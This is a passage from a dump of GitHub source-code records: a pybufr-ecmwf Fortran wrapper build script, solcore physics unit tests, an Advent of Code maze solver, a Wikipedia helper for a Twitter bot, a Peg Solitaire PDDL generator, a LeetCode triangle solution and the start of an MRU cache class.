for the interface definition\n # To circumvent this, remove the not-properly defined constants\n # and replace them by their numerical values\n # (maybe there is a more clever way to do this in f2py, but I have\n # not yet found another way ...)\n adapt_f2py_signature_file(signatures_fullfilename,\n self.integer_sizes, self.set_jelem,\n verbose=self.verbose)\n # #]\n\n add_macosx_wrapper = False\n if add_macosx_wrapper:\n wrapper_name = generate_c_underscore_wrapper(source_dir)\n wrapper_object = os.path.splitext(wrapper_name)[0]+'.o'\n\n # compile the c wrapper code\n cmd = 'gcc -c '+wrapper_name+' -o '+wrapper_object\n os.system(cmd)\n \n # options\n # -r: insert into archive with replacement\n # -l: not used\n # -c: create the archive if it does not exist\n # -s: add/update an index to the archive\n # -v: verbose output\n\n # update the archive\n cmd = 'ar -rlcsv {0} {1}'.\\\n format(self.bufr_lib_file, wrapper_object)\n os.system(cmd)\n\n # #[ create the wrapper interface\n # it might be usefull for debugging to include this option: --debug-capi\n debug_f2py_c_api_option = \"\"\n if self.debug_f2py_c_api:\n debug_f2py_c_api_option = \" --debug-capi \"\n\n if self.fortran_compiler != None:\n cmd = f2py_tool_name+\\\n \" --build-dir \"+self.wrapper_build_dir+\\\n debug_f2py_c_api_option+\\\n \" --f90exec=\"+fortran_compiler+\\\n \" --f90flags='\"+fortran_compiler_flags+\"'\"+\\\n \" --f77flags='\"+fortran_compiler_flags+\"'\"+\\\n \" ./f2py_build/signatures.pyf -L./ -lbufr -c\"\n else:\n # note: adding the fortran_compiler_flags manually like this\n # causes some of them to be included twice, but this doesn't hurt,\n # and is the only way I get the automatic compilation using the\n # g95 compiler going.\n # TODO: Maybe later I could sort out how to use the python f2py\n # module in stead of the executable, and clean-up the compiler\n # flags before starting the tool\n cmd = f2py_tool_name+\\\n \" --build-dir \"+self.wrapper_build_dir+\\\n debug_f2py_c_api_option+\\\n \" --f90flags='\"+fortran_compiler_flags+\"'\"+\\\n \" --f77flags='\"+fortran_compiler_flags+\"'\"+\\\n \" --fcompiler=\"+fortran_compiler+\\\n \" ./f2py_build/signatures.pyf -L./ -lbufr -c\"\n\n if not self.verbose:\n cmd += \" 2>1 >> f2py_build.log\"\n\n if libpath == \"\":\n print(\"Executing command: \", cmd)\n os.system(cmd)\n #(lines_stdout, lines_stderr) = \\\n # run_shell_command(cmd, catch_output = False)\n else:\n #(lines_stdout, lines_stderr) = \\\n # run_shell_command(cmd, libpath = libpath,\n # catch_output = True)\n run_shell_command(cmd, libpath=libpath, catch_output=False)\n\n # #]\n\n # finally, again check for the presence of the wrapper\n # to see if the build was successfull\n try:\n wrapper_name = glob.glob(SO_FILE_PATTERN)[0]\n except IndexError:\n wrapper_name = 'undefined'\n\n if os.path.exists(wrapper_name):\n print(\"a python wrapper to the ECMWF BUFR library \"+\n \"has been generated\")\n return\n else:\n print(\"ERROR: build of python wrapper failed\")\n print(\"the compilation or linking stage failed\")\n raise InterfaceBuildError\n\n # #]\n def extract_constants(self):\n # #[ extract some hardcoded constants\n '''\n extract some hardcoded constants for reuse by the python code\n the ecmwfbufr interfacing is used to retrieve them,\n so this code is run when all interface building is done\n '''\n saved_cwd = os.getcwd()\n # print('saved_cwd = ', saved_cwd)\n os.chdir('..')\n sys.path = get_and_set_the_module_path(sys.path)[0]\n #(sys.path, MY_MODULE_PATH) = get_and_set_the_module_path(sys.path)\n # print('sys.path, MY_MODULE_PATH = ',sys.path, MY_MODULE_PATH)\n\n #from pybufr_ecmwf import ecmwfbufr\n import ecmwfbufr\n\n constants = ecmwfbufr.retrieve_settings()\n os.chdir(saved_cwd)\n\n keys = ['JSUP', 'JSEC0', 'JSEC1', 'JSEC2', 'JSEC3',\n 'JSEC4', 'JELEM', 'JSUBS', 'JCVAL', 'JBUFL',\n 'JBPW', 'JTAB', 'JCTAB', 'JCTST', 'JCTEXT',\n 'JWORK', 'JKEY', 'JTMAX', 'JTCLAS', 'JTEL']\n parameter_dict = {}\n for (i, key) in enumerate(keys):\n parameter_dict[key] = constants[i]\n\n python_parameter_file = 'ecmwfbufr_parameters.py'\n print('creating parameter python file: ', python_parameter_file)\n pfd = open(python_parameter_file, 'w')\n\n # write a simple doc string\n pfd.write('\"\"\"')\n pfd.write(\"\"\"\nThis is a little generated file to hold some constant parameters\ndefining all array sizes in the interfaces to the ecmwf library.\nThese constants are not available through the f2py interface.\nThey are defined in file:\necmwf_bufr_lib/bufr_000380/bufrdc/parameter.F\nand are extracted from that file and stored in this python\nfile for convenience\n\"\"\")\n pfd.write('\"\"\"\\n')\n\n # write the retrieved parameter values to a python file\n for (key, val) in parameter_dict.items():\n txt = key+' = '+str(val)+'\\n'\n pfd.write(txt)\n\n # add some aliasses with easier names\n aliasses = [\"LENGTH_SECTION_0 = JSEC0\",\n \"LENGTH_SECTION_1 = JSEC1\",\n \"LENGTH_SECTION_2 = JSEC2\",\n \"LENGTH_SECTION_3 = JSEC3\",\n \"LENGTH_SECTION_4 = JSEC4\",\n \"LENGTH_SUPPORT_DATA = JSUP\",\n \"LENGTH_ECMWF_KEY_DATA = JKEY\",\n \"NUM_BITS_PER_WORD = JBPW\",\n \"MAX_BUFR_MSG_LENGTH = JBUFL\",\n \"MAX_NR_TABLE_B_D_ENTRIES = JTAB\",\n \"MAX_NR_TABLE_C_ENTRIES = JCTAB\",\n \"MAX_NR_OF_EXP_DATA_DESCRIPTORS = JELEM\"]\n # JSUBS=400 # seems not used\n # JCVAL=150 # seems not used\n # JCTST=9000 # size of text tables from table C\n # JCTEXT=9000 # code table size ?\n # JWORK=4096000 # size of data buffer when encoding sec.4\n #\n # JTMAX=10 ## these 3 define the MTABP tabel dimensions\n # JTEL=255 ## used for storing BUFR tables in memory\n # JTCLAS=64 ##\n\n for alias in aliasses:\n pfd.write(alias+'\\n')\n\n pfd.close()\n\n # make sure the file is executable for all\n ensure_permissions(python_parameter_file, 'x')\n\n # #]\n def copy_sample_files(self):\n # #[ copy sample bufr files\n ''' copy sample bufr files provided by the ECMWF library\n to ensure they are available for testing, even after the\n build directory has been deleted again.\n '''\n\n swroot = get_software_root()\n source_dir = self.get_source_dir()[0]\n\n if source_dir is None:\n # this happens when the \"setup.py build\" stage has run\n # since that stage removes the library sources.\n # However, a \"setup.py install\" command reruns the build\n # and will trigger this condition.\n # No copying is needed anymore, so just return\n return\n \n data_dir = os.path.join(source_dir, 'data')\n sapp_sample_dir = os.path.join(source_dir, 'sapp_sample')\n\n target_dir = os.path.join(swroot, 'sample_bufr_files')\n if not os.path.exists(target_dir):\n os.mkdir(target_dir)\n \n for sample_dir in [data_dir, sapp_sample_dir]:\n for fn in os.listdir(sample_dir):\n src = os.path.join(sample_dir, fn)\n dst = os.path.join(target_dir, fn)\n if not os.path.exists(dst):\n #print('src: {0} dst: {1}'.format(src, dst))\n shutil.copy(src, dst)\n # #]\n\n # #]\n\nif __name__ == \"__main__\":\n print(\"Building ecmwfbufr interface:\\n\")\n # #[ make sure we are in the right directory\n BUILD_DIR = 'pybufr_ecmwf'\n os.chdir(BUILD_DIR)\n # print('cwd = ',os.getcwd())\n\n # #]\n # #[ define how to build the library and interface\n\n # instantiate the class, and build library if needed\n # (4 different tests defined for this step, with 4 different compilers)\n\n #TESTCASE = 1 # test default (=gfortran now)\n TESTCASE = 2 # test default gfortran\n #TESTCASE = 3 # test custom gfortran [broken for now]\n #TESTCASE = 4 # test custom g95-32 bit\n #TESTCASE = 5 # test custom g95-64 bit\n\n if TESTCASE == 1:\n # tested at my laptop at home with a systemwide\n # gfortran v4.7.0 installed\n # successfully tested 29-Aug-2012\n BI = InstallBUFRInterfaceECMWF(verbose=True)\n #BI = InstallBUFRInterfaceECMWF(verbose=True, debug_f2py_c_api=True)\n elif TESTCASE == 2:\n # tested at my laptop at home with a systemwide\n # gfortran v4.7.0 installed\n # successfully tested 29-Aug-2012\n BI = InstallBUFRInterfaceECMWF(verbose=True,\n# set_jelem=800000,\n preferred_fortran_compiler='gfortran')\n # c_flags=\"-fleading-underscore\")\n elif TESTCASE == 3:\n # note that the \"-O\" flag is allways set for each fortran compiler\n # so no need to specify it to the fortran_flags parameter.\n\n # tested at my laptop at home with a gfortran v4.4.0 installed\n # in a user account\n # successfully tested 19-Mar-2010\n # NOTE: this gfortran is no longer installed, so no new testresults\n BI = InstallBUFRInterfaceECMWF(verbose=True,\n fortran_compiler=\"/home/jos/bin/gfortran_personal\",\n fortran_ld_library_path=\"/home/jos/bin/gcc-trunk/lib64\",\n fortran_flags=\"-fno-second-underscore -fPIC\")\n elif TESTCASE == 4:\n # tested at my laptop at home with a g95 v0.92 (32-bit) installed\n # in a user account\n # successfully tested 29-Aug-2012\n BI = InstallBUFRInterfaceECMWF(verbose=True,\n fortran_compiler=\"/home/jos/bin/g95_32\",\n fortran_flags=\"-fno-second-underscore -fPIC -i4 -r8\")\n elif TESTCASE == 5:\n # tested at my laptop at home with a g95 v0.92 (64-bit)\n # installed in a user account\n # successfully tested 29-Aug-2012\n BI = InstallBUFRInterfaceECMWF(verbose=True,\n fortran_compiler=\"/home/jos/bin/g95_64\",\n fortran_flags=\"-fno-second-underscore -fPIC -i4 -r8\")\n # #]\n\n # Build ecmwfbufr interface\n BI.build()\n\n # #[ check for success\n try:\n SO_WRAPPER_NAME = glob.glob(SO_FILE_PATTERN)[0]\n except IndexError:\n SO_WRAPPER_NAME = 'undefined'\n\n if os.path.exists(SO_WRAPPER_NAME):\n print(\"successfully build:\", SO_WRAPPER_NAME)\n else:\n print(\"cannot find a file with pattern:\", SO_FILE_PATTERN)\n print(\"something seems wrong here ...\")\n raise InterfaceBuildError\n # #]\n","repo_name":"jdkloe/pybufr-ecmwf","sub_path":"build_interface.py","file_name":"build_interface.py","file_ext":"py","file_size_in_byte":90176,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"22351848689","text":"from pytest import raises, mark, approx\nfrom unittest.mock import patch, MagicMock\n\n\ndef test_eg():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import eg\n\n T = Quantity(298, \"K\")\n eg0 = Quantity(1.6, \"eV\")\n alpha = Quantity(0.1, \"meV/K\")\n beta = Quantity(600, \"K\")\n\n out = eg(T, eg0, alpha, beta)\n assert out.check(\"electron_volt\")\n assert out < eg0\n\n\n@mark.parametrize(\"fun\", [\"eg_gamma\", \"eg_x\", \"eg_l\"])\ndef test_eg_at_point(fun):\n from pint import Quantity\n\n T = Quantity(298, \"K\")\n eg0 = Quantity(1.6, \"eV\")\n alpha = Quantity(0.1, \"meV/K\")\n beta = Quantity(600, \"K\")\n mock_eg = MagicMock()\n package = \"solcore.parameter_sources.calculable_parameters\"\n\n with patch(f\"{package}.eg\", mock_eg):\n from solcore.parameter_sources.calculable_parameters import eg_gamma, eg_x, eg_l\n\n f = {\"eg_gamma\": eg_gamma, \"eg_x\": eg_x, \"eg_l\": eg_l}[fun]\n f(T, eg0, alpha, beta)\n mock_eg.assert_called_once_with(T, eg0, alpha, beta)\n mock_eg.reset_mock()\n\n\ndef test_band_gap_and_lowest_band():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import band_gap, lowest_band\n\n eg_gamma = Quantity(1.4, \"eV\")\n eg_x = Quantity(1.6, \"eV\")\n eg_l = Quantity(1, \"eV\")\n\n with raises(ValueError):\n band_gap()\n\n gap = band_gap(eg_gamma, eg_x, eg_l)\n assert eg_l == gap\n assert Quantity(\"L\", \"dimensionless\") == lowest_band(gap, eg_gamma, eg_x, eg_l)\n\n\ndef test_eff_mass_split_off():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import eff_mass_split_off\n\n g1 = Quantity(5.18)\n Ep = Quantity(\"18.7 eV\")\n Delta_so = Quantity(\"0.676 eV\")\n Eg = Quantity(\"1.42 eV\")\n\n out = eff_mass_split_off(g1, Ep, Delta_so, Eg)\n assert out.u == \"kilogram\"\n\n\ndef test_eff_mass_z():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import (\n eff_mass_hh_z,\n eff_mass_lh_z,\n )\n from solcore.constants import electron_mass_\n\n g1 = Quantity(5.18)\n g2 = Quantity(1.19)\n\n hh = eff_mass_hh_z(g1, g2)\n lh = eff_mass_lh_z(g1, g2)\n assert hh.u == \"kilogram\"\n assert lh.u == \"kilogram\"\n assert (electron_mass_ / lh + electron_mass_ / hh).m == approx(2 * g1.m)\n assert (electron_mass_ / lh - electron_mass_ / hh).m == approx(4 * g2.m)\n\n\ndef test_eff_mass_110():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import (\n eff_mass_hh_110,\n eff_mass_lh_110,\n )\n from solcore.constants import electron_mass_\n\n g1 = Quantity(5.18)\n g2 = Quantity(1.19)\n g3 = Quantity(1.97)\n\n hh = eff_mass_hh_110(g1, g2, g3)\n lh = eff_mass_lh_110(g1, g2, g3)\n assert hh.u == \"kilogram\"\n assert lh.u == \"kilogram\"\n assert (electron_mass_ / lh + electron_mass_ / hh).m == approx(2 * g1.m)\n assert (electron_mass_ / lh - electron_mass_ / hh).m == approx(g2.m + 3 * g3.m)\n\n\ndef test_eff_mass_111():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import (\n eff_mass_hh_111,\n eff_mass_lh_111,\n )\n from solcore.constants import electron_mass_\n\n g1 = Quantity(5.18)\n g3 = Quantity(1.97)\n\n hh = eff_mass_hh_111(g1, g3)\n lh = eff_mass_lh_111(g1, g3)\n assert hh.u == \"kilogram\"\n assert lh.u == \"kilogram\"\n assert electron_mass_ / lh + electron_mass_ / hh == approx(2 * g1.m)\n assert (electron_mass_ / lh - electron_mass_ / hh).m == approx(4 * g3.m)\n\n\ndef test_eff_mass_electron():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import eff_mass_electron\n from solcore.constants import electron_mass_\n\n F = Quantity(-0.56)\n Ep = Quantity(\"18.7 eV\")\n Delta_so = Quantity(\"0.676 eV\")\n Eg = Quantity(\"1.42 eV\")\n\n out = eff_mass_electron(F, Ep, Delta_so, Eg)\n assert out.u == \"kilogram\"\n\n out = eff_mass_electron(F, Ep * 0, Delta_so, Eg)\n assert electron_mass_ / out == (1 + 2 * F)\n\n\ndef test_permittivity():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import permittivity\n from solcore.constants import vacuum_permittivity_\n\n er = Quantity(12.5)\n out = permittivity(er)\n assert out == vacuum_permittivity_ * 12.5\n\n\nclass TestCalculableParameters:\n def test__getitem__(self):\n from solcore.parameter_sources import CalculableParameters\n from solcore.parameter import ParameterMissing\n\n cp = CalculableParameters()\n with raises(ParameterMissing):\n cp[\"param1\"]\n\n assert cp._params[\"eg_gamma\"] == cp[\"eg_gamma\"]\n\n def test___getattr__(self):\n from solcore.parameter_sources import CalculableParameters\n from solcore.parameter import ParameterMissing\n\n cp = CalculableParameters()\n with raises(ParameterMissing):\n cp.param1\n\n assert cp._params[\"eg_gamma\"] == cp.eg_gamma\n\n def test_load_source(self):\n from solcore.parameter_sources import CalculableParameters\n\n cp = CalculableParameters()\n assert cp == cp.load_source()\n\n def test_register_calculable(self):\n from solcore.parameter_sources import CalculableParameters\n from solcore.parameter import ParameterSourceError\n\n cp = CalculableParameters()\n assert len(cp._params) > 0\n assert tuple(cp._params.keys()) == tuple(cp._descriptions.keys())\n\n with raises(ParameterSourceError):\n\n @CalculableParameters.register_calculable\n def eg_gamma():\n pass\n\n def test_materials(self):\n from solcore.parameter_sources import CalculableParameters\n\n cp = CalculableParameters()\n cp._warned = False\n assert cp.materials == ()\n assert cp._warned\n\n def test_parameters(self):\n from solcore.parameter_sources import CalculableParameters\n\n cp = CalculableParameters()\n assert cp.parameters() == tuple((p for p in cp._params))\n\n def test_list_arguments(self):\n from solcore.parameter_sources import CalculableParameters\n\n cp = CalculableParameters()\n expected = (\"T\", \"eg0_gamma\", \"alpha_gamma\", \"beta_gamma\")\n assert cp.list_arguments(\"eg_gamma\") == expected\n\n def test_get_parameter(self):\n from solcore.parameter_sources import CalculableParameters\n from solcore.parameter import (\n InputArgumentMissing,\n Parameter,\n ParameterMissing,\n ParameterManager,\n )\n\n ParameterManager().add_source(\"Calculable\", CalculableParameters)\n ParameterManager().initialize()\n cp = CalculableParameters()\n\n @CalculableParameters.register_calculable(description=\"The answer\")\n def dummy_param():\n return 42\n\n out = cp.get_parameter(\"Dark matter\", \"dummy_param\")\n assert out.m == 42\n assert out.d == \"The answer\"\n assert out.r == (\"Calculable\",)\n\n @CalculableParameters.register_calculable(description=\"Twice the answer\")\n def dummy_param_2(dummy_param):\n return dummy_param * 2\n\n out = cp.get_parameter(\"Dark matter\", \"dummy_param_2\")\n assert out.m == 84\n assert out.d == \"Twice the answer\"\n assert out.r == (\"Calculable\",)\n\n def get_param(material, param, **kwargs):\n if param == \"param_16\":\n return Parameter(16, reference=\"SomePaper\")\n else:\n raise ParameterMissing()\n\n cp.parman.get_parameter = get_param\n\n @CalculableParameters.register_calculable(description=\"Answer is 16\")\n def dummy_param_16(param_16):\n return param_16\n\n out = cp.get_parameter(\"Dark matter\", \"dummy_param_16\")\n assert out.m == 16\n assert out.d == \"Answer is 16\"\n assert set(out.r) == {\"Calculable\", \"SomePaper\"}\n\n with raises(ParameterMissing):\n cp.get_parameter(\"Dark matter\", \"other_dummy_param\")\n\n @CalculableParameters.register_calculable(description=\"Answer is 16\")\n def dummy_param_with_T(param_16, T):\n return param_16 * T\n\n with raises(InputArgumentMissing):\n cp.get_parameter(\"Dark matter\", \"dummy_param_with_T\")\n\n # Let's get rid of all the dummies...\n dummies = (d for d in cp.parameters() if \"dummy\" in d)\n for d in dummies:\n cp._params.pop(d)\n\n\ndef test_electron_affinity():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import electron_affinity\n\n valence_band_offset = Quantity(\"-0.8 eV\")\n Eg = Quantity(\"1.42 eV\")\n electron_affinity_InSb = Quantity(\"0 eV\")\n Eg_InSb = Quantity(\"0 eV\")\n\n x = electron_affinity(valence_band_offset, Eg, Eg_InSb, electron_affinity_InSb)\n assert x == -valence_band_offset - Eg\n\n\ndef test_density_states():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import density_states\n from solcore.constants import electron_mass_\n\n T = Quantity(298, \"K\")\n mass = 0.1 * electron_mass_\n\n ds = density_states(T, mass)\n assert density_states(1.1 * T, mass).m == approx(ds.m * 1.1 ** (3 / 2))\n assert density_states(0.9 * T, mass).m == approx(ds.m * 0.9 ** (3 / 2))\n\n\ndef test_nc():\n from pint import Quantity\n from solcore.constants import electron_mass_\n\n T = Quantity(298, \"K\")\n mass = 0.1 * electron_mass_\n mock_density_states = MagicMock()\n package = \"solcore.parameter_sources.calculable_parameters\"\n\n with patch(f\"{package}.density_states\", mock_density_states):\n from solcore.parameter_sources.calculable_parameters import Nc\n\n Nc(T, mass)\n assert mock_density_states.call_count == 1\n\n\ndef test_nv():\n from pint import Quantity\n from solcore.constants import electron_mass_\n\n T = Quantity(298, \"K\")\n mass = 0.1 * electron_mass_\n mock_density_states = MagicMock()\n package = \"solcore.parameter_sources.calculable_parameters\"\n\n with patch(f\"{package}.density_states\", mock_density_states):\n from solcore.parameter_sources.calculable_parameters import Nv\n\n Nv(T, 2 * mass, mass)\n assert mock_density_states.call_count == 2\n\n\ndef test_ni():\n from pint import Quantity\n from solcore.parameter_sources.calculable_parameters import ni\n\n T = Quantity(298, \"K\")\n Nc = Quantity(1e18, \"1/cm**3\")\n Nv = Quantity(1e17, \"1/cm**3\")\n band_gap = Quantity(\"1.42 eV\")\n\n ni0 = ni(T, Nc, Nv, band_gap)\n assert ni(0.9 * T, Nc, Nv, band_gap) < ni0\n assert ni(1.1 * T, Nc, Nv, band_gap) > ni0\n assert ni(T, Nc, Nv, 0.9 * band_gap) > ni0\n assert ni(T, Nc, Nv, 1.1 * band_gap) < ni0\n","repo_name":"qpv-research-group/solcore6","sub_path":"tests/test_parameter_sources/test_calculable_parameters.py","file_name":"test_calculable_parameters.py","file_ext":"py","file_size_in_byte":10753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19561078687","text":"from src.helpers import read_comma_separated_list, plot_arr\nfrom collections import defaultdict\nfrom heapq import heappush\nfrom src.int_program import IntProgram\nfrom math import sqrt\n\n\nmove_one_step_in_direction = {\n 4: lambda i, j: (i, j+1),\n 3: lambda i, j: (i, j-1),\n 1: lambda i, j: (i-1, j),\n 2: lambda i, j: (i+1, j)\n}\n\n\nWALL = 0\nEMPTY = 1\nTARGET = 2\nUNKNOWN = 3\n\n\ndef go_to(i, j, path):\n for move in path:\n i, j = move_one_step_in_direction[move](i, j)\n return i, j\n\n\ndef get_all_moves_to_unknown_positions(i, j, path, world):\n options = []\n\n for move in move_one_step_in_direction:\n new_pos = move_one_step_in_direction[move](i, j)\n if world[new_pos] == UNKNOWN:\n options.append(path + [move])\n\n return options\n\n\ndef create_map_of_area(memory, return_shortest_path_when_found):\n world = defaultdict(lambda: UNKNOWN)\n shortest_path = None\n\n queue = [[]]\n\n while queue:\n program = IntProgram(memory)\n path = queue.pop(0)\n i, j = go_to(0, 0, path)\n\n if path:\n program.run(path)\n status = program.output[-1]\n else:\n status = EMPTY\n\n world[(i, j)] = status\n\n if status == TARGET:\n if shortest_path is None:\n shortest_path = path\n if return_shortest_path_when_found:\n return world, shortest_path\n\n if status in (EMPTY, TARGET):\n queue.extend(get_all_moves_to_unknown_positions(i, j, path, world))\n\n return world, shortest_path\n\n\ndef get_longest_path(world, start_pos):\n queue = [(start_pos, 0)]\n visited = set()\n max_depth = -1\n while queue:\n pos, depth = queue.pop(0)\n if depth > max_depth:\n max_depth = depth\n visited.add(pos)\n for move in move_one_step_in_direction:\n new_pos = move_one_step_in_direction[move](*pos)\n if (world[new_pos] in (EMPTY, TARGET)) and (new_pos not in visited):\n queue.append((new_pos, depth+1))\n return max_depth\n\n\nif __name__ == '__main__':\n memory = read_comma_separated_list(\"oxygen_system.txt\", int)\n program = IntProgram(memory)\n\n world, shortest_path = create_map_of_area(memory, False)\n start_pos = go_to(0, 0, shortest_path)\n\n plot_arr(world)\n print(len(shortest_path))\n print(get_longest_path(world, start_pos))\n\n\n\n\n\n\n","repo_name":"peterts/adventofcode2019","sub_path":"src/oxygen_system.py","file_name":"oxygen_system.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1593871896","text":"import os\nimport pprint\nimport random\nimport logging\n\nimport wikipedia\n\n\ndef _parse_heading(line):\n return \"=\" in line, line\n\n\ndef _parse_content_tree(page_content):\n current_heading = \"None\"\n content_tree = {current_heading: []}\n for line in page_content.split(os.linesep):\n if line:\n is_heading, heading = _parse_heading(line)\n if is_heading:\n current_heading = heading\n content_tree[current_heading] = []\n else:\n content_tree[current_heading].append(line)\n logger.debug(pprint.pformat(content_tree))\n return content_tree\n\n\ndef _parse_content_flat(page_content):\n content_flat = []\n tree = _parse_content_tree(page_content)\n skip_sections = {\n \"None\",\n \"== External links ==\",\n \"== Further reading ==\",\n \"== Notes ==\",\n \"== References ==\",\n \"== See also ==\"\n }\n\n for title, section in tree.items():\n if title not in skip_sections:\n content_flat.extend(section)\n\n return content_flat\n\n\ndef get_random_page():\n # https://wikipedia.readthedocs.org/en/latest/quickstart.html\n random_title = wikipedia.random(pages=1)\n random_page = None\n while not random_page:\n try:\n random_page = wikipedia.page(title=random_title)\n except wikipedia.PageError:\n random_title = wikipedia.random(pages=1)\n random_page = None\n except wikipedia.DisambiguationError as e:\n random_title = random.choice(e.options)\n random_page = None\n return random_page\n\n\nlogger = logging.getLogger(__name__)\n\nmisconceptions = None\npython_facts = None\n\n\ndef get_random_misconception():\n global misconceptions\n if not misconceptions:\n misconceptions = _parse_content_flat(wikipedia.page(\"List of common misconceptions\").content)\n return random.choice(misconceptions)\n\n\ndef get_random_python_fact():\n global python_facts\n if not python_facts:\n python_facts = _parse_content_flat(wikipedia.page(\"Python (programming language)\").content)\n return random.choice(python_facts)\n\nif __name__ == \"__main__\":\n\n logging.basicConfig(level=logging.INFO)\n for i in range(3):\n print(random.choice(python_facts))\n\n\ndef get_all_misconceptions():\n return misconceptions\n","repo_name":"andrewtatham/twitterpibot","sub_path":"twitterpibot/logic/wikipediahelper.py","file_name":"wikipediahelper.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"35042698491","text":"#! /usr/bin/env python\r\n\r\nimport sys\r\n\r\nTASK_TEMPLATE = \"\"\";; Problem description:\r\n;; \"*\" denotes \"occupied\"\r\n;; \"o\" denotes \"free\"\r\n;;\r\n%(board_layout)s\r\n;;\r\n;; Try to move one peg to the middle of the top line\r\n;; using peg solitaire movement rules.\r\n;; The problem is unsolvable.\r\n;;\r\n(define (problem pegsolitaire-invasion-%(n)s)\r\n (:domain pegsolitaire-invasion)\r\n (:objects\r\n%(positions)s\r\n )\r\n (:init\r\n%(in_line_facts)s\r\n%(free_facts)s\r\n%(occupied_facts)s\r\n )\r\n (:goal (and\r\n%(goal_facts)s\r\n )\r\n )\r\n)\r\n\"\"\"\r\n\r\nDOMAIN = \"\"\";; Peg Solitaire invasion domain\r\n\r\n(define (domain pegsolitaire-invasion)\r\n (:requirements :typing)\r\n (:types location - object)\r\n (:predicates\r\n (IN-LINE ?x ?y ?z - location)\r\n (occupied ?l - location)\r\n (free ?l - location)\r\n )\r\n\r\n (:action jump\r\n :parameters (?from - location ?over - location ?to - location)\r\n :precondition (and\r\n (IN-LINE ?from ?over ?to)\r\n (occupied ?from)\r\n (occupied ?over)\r\n (free ?to)\r\n )\r\n :effect (and\r\n (not (occupied ?from))\r\n (not (occupied ?over))\r\n (not (free ?to))\r\n (free ?from)\r\n (free ?over)\r\n (occupied ?to)\r\n )\r\n )\r\n)\r\n\"\"\"\r\n\r\n\r\ndef generate_board_layout(n):\r\n free_line = \";;\" + \" o\" * n\r\n occupied_line = \";;\" + \" *\" * n\r\n return \"\\n\".join([free_line] * 5 + [occupied_line] * n)\r\n\r\ndef generate_positions(n):\r\n position = \" pos-%d-%d - location\"\r\n positions = [position % (x, y) for x in xrange(n) for y in xrange(n+5)]\r\n return \"\\n\".join(positions)\r\n\r\ndef generate_in_line_facts(n):\r\n fact = \" (IN-LINE pos-%d-%d pos-%d-%d pos-%d-%d)\"\r\n facts = []\r\n facts += [fact % (x, y, x, y+1, x, y+2)\r\n for x in xrange(n) for y in xrange(n+5-2)]\r\n facts += [fact % (x, y+2, x, y+1, x, y)\r\n for x in xrange(n) for y in xrange(n+5-2)]\r\n facts += [fact % (x, y, x+1, y, x+2, y)\r\n for x in xrange(n-2) for y in xrange(n+5)]\r\n facts += [fact % (x+2, y, x+1, y, x, y)\r\n for x in xrange(n-2) for y in xrange(n+5)]\r\n return \"\\n\".join(facts)\r\n\r\ndef generate_free_facts(n):\r\n fact = \" (free pos-%d-%d)\"\r\n facts = [fact % (x, y) for x in xrange(n) for y in xrange(n, n+5)]\r\n return \"\\n\".join(facts)\r\n\r\n\r\ndef generate_occupied_facts(n):\r\n fact = \" (occupied pos-%d-%d)\"\r\n facts = [fact % (x, y) for x in xrange(n) for y in xrange(n)]\r\n return \"\\n\".join(facts)\r\n\r\ndef generate_goal_facts(n):\r\n return \" (occupied pos-%d-%d)\" % (n // 2, n + 4)\r\n\r\ndef generate_task(n):\r\n board_layout = generate_board_layout(n)\r\n positions = generate_positions(n)\r\n in_line_facts = generate_in_line_facts(n)\r\n free_facts = generate_free_facts(n)\r\n occupied_facts = generate_occupied_facts(n)\r\n goal_facts = generate_goal_facts(n)\r\n return TASK_TEMPLATE % locals()\r\n\r\n\r\ndef generate_task_file(n):\r\n with open(\"prob%.02d.pddl\" % n, \"w\") as f:\r\n f.write(generate_task(n))\r\n\r\ndef generate_domain_file():\r\n with open(\"domain.pddl\", \"w\") as f:\r\n f.write(DOMAIN)\r\n\r\nif __name__ == \"__main__\":\r\n \r\n if len(sys.argv) < 2:\r\n print(\"Usage: pegsol-row5.py \")\r\n else:\r\n generate_domain_file()\r\n map(generate_task_file, map(int, sys.argv[1:]))\r\n","repo_name":"AI-Planning/unsolve-ipc-2016","sub_path":"domains/generated/pegsol-row5.py","file_name":"pegsol-row5.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42601501573","text":"\"\"\"\nhttps://leetcode.com/problems/triangle/\nRuntime: 60 ms, faster than 60.70% of Python3 online submissions for Triangle.\nMemory Usage: 13.8 MB, less than 20.00% of Python3 online submissions for Triangle.\n\"\"\"\n\n\nclass Solution:\n def minimumTotal(self, triangle: List[List[int]]) -> int:\n dp = []\n for i in range(len(triangle)):\n temp = []\n for j in range(len(triangle[i])):\n if i == 0 and j == 0:\n temp.append(triangle[i][j])\n elif j == 0:\n temp.append(triangle[i][j] + dp[-1][j])\n elif j == len(triangle[i]) - 1:\n temp.append(triangle[i][j] + dp[-1][j - 1])\n else:\n temp.append(min(triangle[i][j] + dp[-1][j - 1], triangle[i][j] + dp[-1][j]))\n dp.append(temp)\n return min(dp[-1])","repo_name":"google-gazzza/algorithm","sub_path":"leetcode/medium/120_triangle/hsh2438.py","file_name":"hsh2438.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"70245652945","text":"#!/usr/bin/python3\n\"\"\"\n Contains class BasicCache\n\"\"\"\nfrom base_caching import BaseCaching\n\n\nclass MRUCache(BaseCaching):\n \"\"\"\n Caching using MRU algorithm\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize instance variables\n \"\"\"\n 